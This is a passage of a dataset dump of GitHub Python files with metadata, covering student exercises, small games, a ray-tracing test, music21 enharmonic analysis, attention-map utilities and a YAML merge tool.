{}\"\nprint(joke_evaluation.format(hilarious))\n\nw = \"This is the left side of...\"\ne = \"a string wirh a right side\"\n\nprint(w + e)","repo_name":"ZhangChen-Tony/Learn-Python3-the-HARD-WAY","sub_path":"6字符串和文本/巩固练习/re1.py","file_name":"re1.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5090697698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 17:12:07 2019\n\n@author: HIMANSHU SINGH\n\"\"\"\n\n# Printing Checkerboard Pattern\n\nnum = 1 \nwhile num < 8:\n if num%2 == 0:\n print(\" *\"*8)\n else:\n print(\"* \"*8)\n num += 1","repo_name":"himanshu-singh14/FSDP2019","sub_path":"Day 1, 07-May-19/Programs/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32101905171","text":"'''\nWenbo Pan\nCS 5001, Fall 2021\n\nThis program is for the final project checker.\n\nI referenced this Youtube channel https://www.youtube.com/watch?v=vnd3RfeG3NM\nfrom its tutorial on the design of classes and get avaliable moves\n'''\n\nNUM_SQUARES = 8 # The number of squares on each row.\nSQUARE = 50 # The size of each square in the checkerboard.\nSQUARE_COLORS = (\"light gray\", \"white\")\nVALID_SQUARE = \"red\"\nBOARD_COLOR = \"black\"\nPIECES_COLOR = (\"dark red\", \"black\")\nCUSHION = PADDING = 1\nKING_RADIUS = 20\n\n\nCIRCLE_RADIUS = (SQUARE / 2) - 1\nCIRCLE_POSITION = 0.5\nBLACK_ROW = (0, 1, 2)\nRED_ROW = (5, 6, 7)\n\nRED = \"Red\"\nBLACK = \"Black\"\n\nINITIAL_PIECES = 12\n\nRED_DIRECTION = -1\nBLK_DIRECTION = 1\n\nFST_ROW = FST_COL = 0\nLST_ROW = LST_COL = 7\n","repo_name":"wp161/Checkers","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35646111891","text":"if __name__ == '__main__':\n file_lines = open(\"input.txt\", \"r\").read().splitlines()\n arr_len = len(file_lines[0])\n total_sum = [0] * arr_len\n gamma = [0] * arr_len\n epsilon = [0] * arr_len\n\n for line in file_lines:\n for i in range(0, arr_len):\n total_sum[i] = total_sum[i] + int(line[i])\n\n for i in range(0, arr_len):\n gamma[i] = 1 if total_sum[i] > len(file_lines)/2 else 0\n epsilon[i] = 0 if total_sum[i] > len(file_lines)/2 else 1\n\n gamma_str = ''.join(str(e) for e in gamma)\n epsilon_str = ''.join(str(e) for e in epsilon)\n\n print(int(gamma_str, 2) * int(epsilon_str, 2))\n","repo_name":"martin98m/advent-of-code","sub_path":"day03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43654257936","text":"from tkinter import *\nfrom Pendu import dessinPendu\nfrom fonction_logique_pendu import *\n\nmot = ChoixDuMot()\nCOULEUR_DE_FOND = \"#23272A\"\nHAUTEUR_DE_CANVAS = 350 # Variables\nLARGEUR_DE_CANVAS = 450\n\n\nroot = Tk() # Création de la fenêtre\n\nroot.title(\"Pendu\")\nroot.geometry(\"1920x1080\") # Configuration de la fenêtre\nroot.minsize(480, 360)\nroot.config(background=COULEUR_DE_FOND)\n\nboiteGraphique = Frame(root, bg=COULEUR_DE_FOND) # Création de la boîte qui contiendra le dessin et le mot\n\ngraphique = Canvas(boiteGraphique, bg=COULEUR_DE_FOND, height=HAUTEUR_DE_CANVAS, width=LARGEUR_DE_CANVAS, bd=0, highlightthickness=0)\ngraphique.create_text(LARGEUR_DE_CANVAS/2, 
HAUTEUR_DE_CANVAS/2, text=dessinPendu(0), fill=\"white\", font=(\"Helvetica\", 30))\ngraphique.pack()\n\nmotCache = Label(boiteGraphique, text=texteMotCache, font=(\"Helvetica\", 20), bg=COULEUR_DE_FOND, fg=\"white\")\nmotCache.pack()\n\nboiteGraphique.pack(side=TOP) \n\nboiteInput = Frame(root, bg=COULEUR_DE_FOND) # Création de la boîte qui contiendra l'input et la liste des lettres déjà rentrées\n\nentree = Entry(boiteInput, font=(\"Helvetica\", 20), bg=\"white\", fg=COULEUR_DE_FOND) # Création de la zone où l'on entre les lettres\nentree.pack(side=TOP)\n\nbouton = Button(boiteInput, text=\"Valider la lettre\", font=(\"Helvetica\", 20), bg=COULEUR_DE_FOND, fg=\"white\", command=ValideLettre)\nbouton.pack(side=TOP)\n\nboiteInput.pack()\n\nroot.mainloop()\n","repo_name":"LeGrandCthulhu/Pendu","sub_path":"Fenêtre (Pas fini)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35159496268","text":"class Solution:\n def productExceptSelf(self, nums: list[int]) -> list[int]:\n n = len(nums)\n pre_product = [1]*n\n for i in range(1, n):\n pre_product[i] = pre_product[i-1]*nums[i-1]\n suf_product = [1]*n\n for i in range(n-2, -1, -1):\n suf_product[i] = suf_product[i+1]*nums[i+1]\n result = []\n for i in range(n):\n result.append(pre_product[i]*suf_product[i])\n\n return result\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3, 4]\n print(f\"{nums}\")\n print('----------Answer Below----------')\n print(Solution().productExceptSelf(nums))\n","repo_name":"showboy0704/leetcode","sub_path":"Data Structure/Array/238_array_product_except_self.py","file_name":"238_array_product_except_self.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2228091245","text":"from art import logo\nimport os\n\nclear = lambda: os.system('clear')\n\n# Starting the auction with logo\nprint(\"Welcome to Bajpai Island!\\nWe are here to auction paintings by Suyash Bajpai!\")\nprint(logo)\nprint(\"\\n==============================================================\")\n\n# Items Dictionary\npaintings = {\"Mona Lisa\" : None, \"Invincible\": None, \"La Lisa\": None, \"Legendary\": None}\npaintings_sold_info = paintings.copy()\n\npainting_list = list(paintings.keys())\nnumOfItems = len(painting_list)\n\ndef ask():\n bidder = input(\"What is your name?\")\n bid = int(input((\"What is your bid: $\")))\n bidder_available = input(\"Is there any other bidder for this painting?\\nType 'yes/y' or 'no/n\")\n return bidder, bid, bidder_available\n\n# Check a list of dictionaries for the maximum bid \ndef decide(info):\n maxBid = 0 \n maxBidIdx = -1\n for idx, bidder in enumerate(info):\n currBid = int(bidder['bid'])\n if currBid > maxBid:\n maxBid = currBid\n maxBidIdx = idx\n return info[maxBidIdx]\n\nwhile numOfItems > 0:\n currItemNum = 5 - numOfItems\n print(f\"Bid for Painting#{currItemNum}\")\n print(f\"This painting is called: {painting_list[currItemNum-1]}\")\n bidder_available = input(\"Is there any bidder for this painting?\\nType 'yes/y' or 'no/n'\\n\")\n if bidder_available == 'yes' or bidder_available == 'y':\n info = []\n while True:\n if bidder_available == 'yes' or bidder_available == 'y': \n name, amount, bidder_available = ask()\n print(\"\")\n info.append({'name': name, 'bid': amount})\n else:\n break\n paintings[painting_list[currItemNum-1]] = info\n clear()\n else:\n 
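# no opening bidder: the painting stays None in paintings_sold_info and is reported unsold later\n        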
print(\"=======================================================\")\n numOfItems -= 1\n continue\n print(\"=======================================================\")\n paintings_sold_info[painting_list[currItemNum-1]] = decide(paintings[painting_list[currItemNum-1]])\n numOfItems -= 1\n clear()\n \n# Pretty Print\nnumOfItems = len(painting_list)\nprint(\"Auction Ends! Immense Gratitude for Mr. Suyash Bajpai.\\nThank you all for coming.\\nCongratulations to all the buyers.\")\nwhile numOfItems > 0:\n currItemNum = 5 - numOfItems\n print(f\"\\n#{currItemNum}\")\n if paintings_sold_info[painting_list[currItemNum-1]] is None:\n print(f\"{painting_list[currItemNum-1]} remains unsold!\")\n numOfItems -= 1\n continue\n print(f\"{painting_list[currItemNum-1]} sold to {paintings_sold_info[painting_list[currItemNum-1]]['name']} for ${paintings_sold_info[painting_list[currItemNum-1]]['bid']}\")\n numOfItems -= 1","repo_name":"sypai/100DaysOfPython","sub_path":"Day9/auction.py","file_name":"auction.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23171172326","text":"\"\"\"\ns Testing the absorption material on 1 sphere with a cone beam\n\"\"\"\n\nimport logging\nlogging.getLogger('trimesh').disabled = True\nlogging.getLogger('shapely.geos').disabled = True\nlogging.getLogger('matplotlib').setLevel(logging.CRITICAL)\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pvtrace import *\n\nworld = Node(\n name=\"world (air)\",\n geometry=Sphere(\n radius=10.0,\n material=Material(refractive_index=1.0,\n\n )\n )\n)\n\n# sphere = Node(\n# name=\"sphere (abs)\",\n# geometry=Sphere(\n# radius=1.0,\n# material=Material(\n# refractive_index=1.5,\n# components=[\n#\n# Absorber(coefficient=12.1)\n# ]\n# ),\n# ),\n# parent=world\n# )\n# sphere = Node(\n# name=\"sphere (glass)\",\n# geometry=Sphere(\n# radius=0.8,\n# material=Material(\n# refractive_index=1.0,\n# components=[\n# Scatterer(coefficient=4.1)\n# ]\n#\n# ),\n# ),\n# parent=world\n# )\nbox = Node(\n name=\"box_1\",\n geometry=Box(\n (2.0, 2.0, 0.5),\n material=Material(refractive_index=20.5),\n ),\n parent=world\n)\n# box.translate((0.0, 0.0, 0.0))\nray = Ray(\n position=(-1.0, 0.0, 0.9),\n direction=(1.0, 0.0, 0.0),\n wavelength=555.0\n)\nimport functools\n\nlight = Node(\n name=\"Light (555nm)\",\n light=Light(direction=functools.partial(cone, np.pi / 32)),\n parent=world\n)\nlight.translate((0.0, 0.0, 3))\nlight.rotate(np.pi, [1, 0, 0])\nscene = Scene(world)\nnp.random.seed(0)\nvis = MeshcatRenderer(wireframe=True, open_browser=True)\nfor ray in scene.emit(40):\n steps = photon_tracer.follow(scene, ray)\n path, decisions = zip(*steps)\n # for position in path[0].position\n vis.add_ray_path(path)\n\nvis.render(scene)\nimport time\ntime.sleep(10)\n","repo_name":"xdshiro/ray_tracing","sub_path":"test_sphere.py","file_name":"test_sphere.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22458680011","text":"\"\"\"Utils\nCreated: Nov 11,2019 - Yuchong Gu\nRevised: Dec 03,2019 - Yuchong Gu\n\"\"\"\nimport torch\nimport random\nimport os\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm_notebook as tqdm\n\nclass CenterLoss(nn.Module):\n def __init__(self):\n super(CenterLoss, 
self).__init__()\n self.l2_loss = nn.MSELoss(reduction='sum')\n\n def forward(self, outputs, targets):\n return self.l2_loss(outputs, targets) / outputs.size(0)\n\ndef batch_augment(images, attention_map, mode='crop', theta=0.5, padding_ratio=0.1):\n batches, _, imgH, imgW = images.size()\n\n if mode == 'crop':\n crop_images = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_c = random.uniform(*theta) * atten_map.max()\n else:\n theta_c = theta * atten_map.max()\n\n crop_mask = F.upsample_bilinear(atten_map, size=(imgH, imgW)) >= theta_c\n nonzero_indices = torch.nonzero(crop_mask[0, 0, ...])\n\n height_min = max(int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH), 0)\n height_max = min(int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH), imgH)\n width_min = max(int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW), 0)\n width_max = min(int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW), imgW)\n\n crop_images.append(\n F.upsample_bilinear(images[batch_index:batch_index + 1, :, height_min:height_max, width_min:width_max],\n size=(imgH, imgW)))\n crop_images = torch.cat(crop_images, dim=0)\n return crop_images\n\n elif mode == 'drop':\n drop_masks = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_d = random.uniform(*theta) * atten_map.max()\n else:\n theta_d = theta * atten_map.max()\n\n drop_masks.append(F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d)\n drop_masks = torch.cat(drop_masks, dim=0)\n drop_images = images * drop_masks.float()\n return drop_images\n\n else:\n raise ValueError('Expected mode in [\\'crop\\', \\'drop\\'], but received unsupported augmentation method %s' % mode)\n\n\ndef visualize_attention(model, dataset, device, visualize_save_path, batch_size=16):\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,shuffle=True)\n ToPILImage = transforms.ToPILImage()\n MEAN = torch.tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1)\n STD = torch.tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1)\n fakehaimgs = []\n realhaimgs = []\n\n for i, (inputs, labels) in tqdm(enumerate(dataloader),total=len(dataloader)):\n inputs = inputs.to(device)\n preds, _, attention_maps = model(inputs)\n attention_maps = F.upsample_bilinear(attention_maps, size=(inputs.size(2), inputs.size(3)))\n attention_maps = torch.sqrt(attention_maps.cpu() / attention_maps.max().item())\n\n heat_attention_maps = generate_heatmap(attention_maps)\n raw_image = inputs.cpu() * STD + MEAN\n heat_attention_image = raw_image * 0.5 + heat_attention_maps * 0.5\n raw_attention_image = raw_image * attention_maps\n\n for batch_idx in range(inputs.size(0)):\n rimg = ToPILImage(raw_image[batch_idx])\n raimg = ToPILImage(raw_attention_image[batch_idx])\n haimg = ToPILImage(heat_attention_image[batch_idx])\n rimg.save(os.path.join(visualize_save_path, '%03d_raw.jpg' % (i * batch_size + batch_idx)))\n raimg.save(os.path.join(visualize_save_path, '%03d_raw_atten.jpg' % (i * batch_size + batch_idx)))\n haimg.save(os.path.join(visualize_save_path, '%03d_heat_atten.jpg' % (i * batch_size + batch_idx)))\n if labels[batch_idx] == 0:\n fakehaimgs.append(haimg)\n else: \n realhaimgs.append(haimg)\n\n _, axes = plt.subplots(nrows=2, ncols=5, figsize=(24, 10))\n for idx, image in enumerate(fakehaimgs[:5], start=0):\n axes.ravel()[idx].imshow(image)\n axes.ravel()[idx].axis('off')\n 
axes.ravel()[idx].set_title(\"Label:Fake\")\n plt.tight_layout()\n\n for idx, image in enumerate(realhaimgs[:5], start=5):\n axes.ravel()[idx].imshow(image)\n axes.ravel()[idx].axis('off')\n axes.ravel()[idx].set_title(\"Label:Real\")\n plt.tight_layout()\n\ndef generate_heatmap(attention_maps):\n heat_attention_maps = []\n heat_attention_maps.append(attention_maps[:, 0, ...]) # R\n heat_attention_maps.append(attention_maps[:, 0, ...] * (attention_maps[:, 0, ...] < 0.5).float() + \\\n (1. - attention_maps[:, 0, ...]) * (attention_maps[:, 0, ...] >= 0.5).float()) # G\n heat_attention_maps.append(1. - attention_maps[:, 0, ...]) # B\n return torch.stack(heat_attention_maps, dim=1)\n","repo_name":"aides9/deepfake_video_detection","sub_path":"Utils/Wsdan_utils.py","file_name":"Wsdan_utils.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32127634931","text":"print(\"\\nCALCULO DE LA MEDIA ARITMETICA\")\n\nlis_num = []\n\nprint (\"Ingrese los valores, (ingrese un numero negativo para cerrar)\")\nwhile True: \n\ttry: \n\t\tnum = float(input(\"-> \"))\n\t\tif num >= 0:\n\t\t\tlis_num.append(num)\t\t\t\t\n\t\telse:\n\t\t\tbreak\n\texcept ValueError:\n\t\tprint (\"Error, ingrese un numero\")\n\t\tcontinue\n\nn_valores = len(lis_num)\nsuma_valores = sum(lis_num)\n\nprint (f\"Media Aritmetica es: \")\nprint (f\"Valores ingresado: {lis_num} = {suma_valores}\")\nprint (f\"Cantidad de Valores ingresados = {n_valores}\")\nprint (f\"El calculo es: {suma_valores} / {n_valores} = {suma_valores/n_valores}\" )\n","repo_name":"Chess10/PYTHON","sub_path":"FUNDAMENTOS DE PROGRAMACION/1. Fundamentos Basicos/EJERCICIOS/Media Aritmetica.py","file_name":"Media Aritmetica.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39946553105","text":"import difflib\nfrom colorama import Fore, Back, Style, init\nimport yaml\nfrom mergedb.merge_functions.dict import deep_merge, simple_merge\nfrom mergedb.merge_functions.merge_controller import DeepMergeController, KeyedArrayMergeRule\nfrom mergedb.errors import MdbDeclarationError\ninit()\n\n\nclass Declaration(object):\n\n def __init__(self,\n layer_path,\n base_declaration,\n inherited_declarations: list = None,\n inherited_config: dict = None,\n database=None):\n \"\"\"\n A declaration instance contains a base_declaration (any declaration for which a build is specified), all of the\n layers it inherits, and any configuration that is inherited from a higher up object.\n\n :param layer_path:\n File path that the declaration was loaded from\n\n :param base_declaration:\n The declaration dict that the merge is performed on\n\n :param inherited_declarations:\n Any other layers that this declaration inherits\n\n :param inherited_config:\n If mergedb config options are specified on an inherited object, they are passed here (and will be overridden\n by what is found in the base_declaration, if present.)\n \"\"\"\n self.database = database\n self.layer_path = layer_path\n self.short_name = layer_path.split(\"/\")[-1]\n self.base = base_declaration\n if inherited_declarations:\n self.inherited = inherited_declarations\n else:\n self.inherited = []\n if inherited_config:\n self.inherited_config = inherited_config\n else:\n self.inherited_config = {}\n self.merge_history = []\n self.merge_rules = []\n self.config = self.set_config()\n self.load_merge_rules()\n 
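# build the controller last so it sees the merge rules and any knockout setting loaded above\n        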
self.merge_controller = self.load_merge_controller()\n\n def __repr__(self):\n return f\"\"\n\n def get_name(self):\n \"\"\"\n Strips the extension off of the name and returns it.\n\n :return:\n Short name of the dictionary without file extension\n \"\"\"\n return self.short_name.split('.')[0]\n\n def load_merge_controller(self):\n if 'knockout' in self.config:\n knockout = self.config['knockout']\n else:\n knockout = None\n return DeepMergeController(list_merge_rules=self.merge_rules, knockout=knockout)\n\n def load_merge_rules(self):\n if 'merge_rules' in self.config:\n if 'keyed_array' in self.config['merge_rules']:\n for rule_config in self.config['merge_rules']['keyed_array']:\n if 'path' in rule_config:\n path = rule_config['path']\n else:\n path=[]\n if 'attribute' not in rule_config or 'key' not in rule_config:\n raise MdbDeclarationError(msg=f\"['path', 'attribute'] are required for keyed_array merge rules\")\n rule = KeyedArrayMergeRule(path, rule_config['attribute'], rule_config['key'])\n self.merge_rules.append(rule)\n\n def load_inherited_from_config(self):\n if 'inherit' in self.config:\n for path in self.config['inherit']:\n try:\n self.inherited.append(self.database.load_declaration(path))\n except MdbDeclarationError as e:\n raise MdbDeclarationError(f\"{self.layer_path} tried to load inherited layer {path}, but was unable: {e}\")\n\n def set_config(self):\n \"\"\"\n This method deep merges the inherited config into the base config, if present\n\n :return:\n The merged config dict\n \"\"\"\n base_config = {}\n if 'mergedb' in self.base:\n base_config = self.base['mergedb']\n # Remove the mergedb key from base if present\n del(self.base['mergedb'])\n return deep_merge(self.inherited_config, base_config)\n\n def merge_inherited(self):\n \"\"\"\n This method performs a top-down merge from self.inherited down to self.base in the manner prescribed by the\n config.\n\n :return:\n The merged dict\n \"\"\"\n # Clear the history in case someone is importing and calling this method more than once\n self.merge_history = []\n # Todo: Implement a callback system and get this merge_history appending BS out of this method\n current = {}\n if self.inherited:\n for declaration in self.inherited:\n if not current:\n self.merge_history.append(f\"{Fore.BLUE}Initial Layer {declaration.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n self.merge_history.append(yaml.dump(declaration.base))\n current = declaration.base\n else:\n self.merge_history.append(f\"{Fore.BLUE}Merge Layer {declaration.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n current_lines = yaml.safe_dump(current).split('\\n')\n current = self.merge_controller.merge(current, declaration.base)\n post_lines = yaml.safe_dump(current).split('\\n')\n for line in difflib.ndiff(current_lines, post_lines):\n self.merge_history.append(self._colorize_diff(line))\n self.merge_history.append(f\"{Fore.BLUE}Merge Layer {self.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n current_lines = yaml.safe_dump(current).split('\\n')\n post = self.merge_controller.merge(current, self.base)\n post_lines = yaml.safe_dump(post).split('\\n')\n for line in difflib.ndiff(current_lines, post_lines):\n self.merge_history.append(self._colorize_diff(line))\n self.merge_history.append(\"Final Result\")\n self.merge_history.append(\"====================================\")\n 
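# the fully merged document closes out the history log\n        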
self.merge_history.append(yaml.safe_dump(post))\n return post\n\n @staticmethod\n def _colorize_diff(line):\n \"\"\"\n Diff output is run through this method one line at a time in order to colorize it for context\n\n :param line:\n One line of diff output\n\n :return:\n One line of diff output, possibly wrapped in color\n \"\"\"\n if line.startswith('+'):\n return Fore.GREEN + line + Fore.RESET\n elif line.startswith('-'):\n return Fore.RED + line + Fore.RESET\n elif line.startswith('^') or line.startswith('?'):\n return Fore.CYAN + line + Fore.RESET\n else:\n return line\n\n def print_history(self):\n \"\"\"\n Prints self.merge_history to stdout\n \"\"\"\n for line in self.merge_history:\n print(line)","repo_name":"graysonhead/mergedb","sub_path":"mergedb/data_types/declaration.py","file_name":"declaration.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14187866216","text":"from __future__ import annotations\n\nimport itertools\nfrom math import inf\nimport unittest\n\nfrom music21 import environment\nfrom music21 import pitch\nfrom music21 import musedata\n\nenvironLocal = environment.Environment('analysis.enharmonics')\n\n\nclass EnharmonicScoreRules:\n def __init__(self):\n self.sameStaffLine = False\n self.alterationPenalty = 4\n self.augDimPenalty = 2\n self.mixSharpsFlatsPenalty = False\n\nclass ChordEnharmonicScoreRules(EnharmonicScoreRules):\n def __init__(self):\n super().__init__()\n self.mixSharpsFlatsPenalty = 2\n\nclass EnharmonicSimplifier:\n '''\n Takes any pitch list input and returns the best enharmonic respelling according to the input\n criteria and rule weightings.\n Those criteria and rule weightings are currently fixed, but in future the user should be able\n to select their own combination and weighting of rules according to preferences,\n with predefined defaults for melodic and harmonic norms.\n Note: EnharmonicSimplifier itself returns nothing.\n '''\n def __init__(self, pitchList, ruleClass=EnharmonicScoreRules):\n if isinstance(pitchList[0], str):\n pitchList = [pitch.Pitch(p) for p in pitchList]\n\n self.pitchList = pitchList\n self.ruleObject = ruleClass()\n self.allPossibleSpellings = None\n self.allSpellings = []\n self.getRepresentations()\n\n def getRepresentations(self):\n '''\n Takes a list of pitches or pitch names and retrieves all enharmonic spellings.\n Note: getRepresentations itself returns nothing.\n '''\n allSpellings = []\n for p in self.pitchList:\n spellings = [p] + p.getAllCommonEnharmonics(1)\n allSpellings.append(spellings)\n self.allSpellings = allSpellings\n\n def getProduct(self):\n self.allPossibleSpellings = list(itertools.product(*self.allSpellings))\n return self.allPossibleSpellings\n\n def bestPitches(self):\n '''\n Returns a list of pitches in the best enharmonic\n spelling according to the input criteria.\n\n >>> pList1 = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n >>> es = analysis.enharmonics.EnharmonicSimplifier(pList1)\n >>> es.bestPitches()\n (, , )\n >>> pList2 = ['D--', 'E', 'F##']\n >>> es = analysis.enharmonics.EnharmonicSimplifier(pList2)\n >>> es.bestPitches()\n (, , )\n '''\n self.getProduct()\n bestPitches = []\n minScore = inf\n for possibility in self.allPossibleSpellings:\n thisAugDimScore = self.getAugDimScore(possibility)\n thisAlterationScore = self.getAlterationScore(possibility)\n thisMixSharpsFlatScore = self.getMixSharpFlatsScore(possibility)\n thisScore = thisAugDimScore + 
thisAlterationScore + thisMixSharpsFlatScore\n if thisScore < minScore:\n minScore = thisScore\n bestPitches = possibility\n return bestPitches\n\n def getAlterationScore(self, possibility):\n '''\n Returns a score according to the number of sharps and flats in a possible spelling.\n The score is the sum of the flats and sharps + 1, multiplied by the alterationPenalty.\n '''\n if self.ruleObject.alterationPenalty is False:\n return 1\n\n joinedPossibility = ''.join([p.name for p in possibility])\n flatCount = joinedPossibility.count('-')\n sharpCount = joinedPossibility.count('#')\n score = (flatCount + sharpCount + 1) * self.ruleObject.alterationPenalty\n return score\n\n def getMixSharpFlatsScore(self, possibility):\n '''\n Returns a score based on the mixture of sharps and flats in a possible spelling:\n the score is given by the number of the lesser used accidental (sharps or flats)\n multiplied by the mixSharpsFlatsPenalty.\n '''\n if self.ruleObject.mixSharpsFlatsPenalty is False:\n return 1\n\n joinedPossibility = ''.join([p.name for p in possibility])\n flatCount = joinedPossibility.count('-')\n sharpCount = joinedPossibility.count('#')\n score = min([flatCount, sharpCount]) * self.ruleObject.mixSharpsFlatsPenalty\n return score\n\n def getAugDimScore(self, possibility):\n '''\n Returns a score based on the number of augmented and diminished intervals between\n successive pitches in the given spelling.\n '''\n if self.ruleObject.augDimPenalty is False:\n return 1\n\n intervalStr = ''\n for i in range(len(possibility) - 1):\n p0 = musedata.base40.base40Representation[possibility[i].name]\n p1 = musedata.base40.base40Representation[possibility[i + 1].name]\n base40diff = (p1 - p0) % 40\n intervalStr += musedata.base40.base40IntervalTable.get(base40diff, 'ddd')\n dimCount = intervalStr.count('A')\n augCount = intervalStr.count('d')\n score = (dimCount + augCount + 1) * self.ruleObject.augDimPenalty\n return score\n\n# ------------------------------------------------------------------------------\nclass Test(unittest.TestCase):\n\n def testBestPitches(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n bestPitchList = es.bestPitches()\n\n self.assertEqual(len(pList), 3)\n self.assertEqual(len(bestPitchList), 3)\n self.assertIsInstance(bestPitchList[0], pitch.Pitch)\n\n def testGetAlterationScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testAltScore = es.getAlterationScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testAltScore, int)\n\n def testGetMixSharpFlatsScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testMixScore = es.getMixSharpFlatsScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testMixScore, int)\n\n def testGetAugDimScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testAugDimScore = es.getAugDimScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testAugDimScore, int)\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n import music21\n 
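# mainTest runs the module doctests together with the Test case defined above\n    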
music21.mainTest(Test)\n","repo_name":"cuthbertLab/music21","sub_path":"music21/analysis/enharmonics.py","file_name":"enharmonics.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"24853694786","text":"import collections\n\n#Q1\ndef q1(big_list):\n count = 0\n for i in big_list:\n for j in range(len(i)):\n count += i[j]\n return count\n\n\n#Q2A\ndef hailstone(n):\n while n > 1:\n if n % 2 == 0:\n n = int(n/2)\n else:\n n = n * 3 + 1\n yield n\n\n\n#2B\ngenerator = (i for i in hailstone(11))\nfor i in generator:\n print(int(i), end=' ')\nprint(\" \")\n\n\n#2C\nclass Gen:\n def __init__(self, data):\n self.num = data\n\n def __next__(self):\n if self.num == 1:\n raise StopIteration\n\n if self.num % 2 == 0:\n self.num = int(self.num / 2)\n else:\n self.num = int(self.num*3 + 1)\n\n return self.num\n\n def __iter__(self):\n return self\n\n\n#Q3\ndef reachable(graph, node):\n c = collections.deque([node])\n list_set = [node]\n while c:\n node = c.popleft()\n for i in graph[node]:\n if i not in list_set:\n c.appendleft(i)\n list_set.append(i)\n return list_set\n\n\n#Q5A\ndef q5a():\n i = 2\n print(\"id before:\", id(i))\n i = 8\n print(\"id after:\", id(i))\n\n\n#5B\nclass mutableInt(int):\n def _init_(self, value):\n self.value = value\n\n def _call_(self, value):\n self.value = value\n\n def _str_(self):\n return str(self.value)\n\n\n#Q7A\ndef q7(number_list):\n less_than = list(filter(lambda x: x < 12, number_list))\n sum = 0\n for i in less_than:\n sum = sum + (2 ** i)\n return sum\n\n\n#7C\ndef get_max_camera(cameras):\n from functools import reduce\n return reduce(lambda x, y: x if x[1] > y[1] else y, cameras)\n\n\n#7B\ndef get_max_rez(cameras):\n return cameras[get_max_camera(cameras)][1]\n\n\n\n#test\n#q2\nfor num in hailstone(5):\n print(num)\n\ngen = Gen(5)\nfor i in gen:\n print(int(i), end=' ')\nprint(\" \")\n\n#q5\nq5a()\ni = mutableInt(5)\nprint(\"id before:\", id(i))\ni._call_(8)\nprint(\"id after:\", id(i))\n\n#q7\nnum_list = [1, 6, 17, 20]\nprint(q7(num_list))\n\n","repo_name":"lirshindalman/Phyton-Project","sub_path":"Introduction/HW2/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19750164830","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport re\nimport os\nimport sys\nimport argparse\nfrom teimedlib.clean_text import clean_text\nfrom teimedlib.ualog 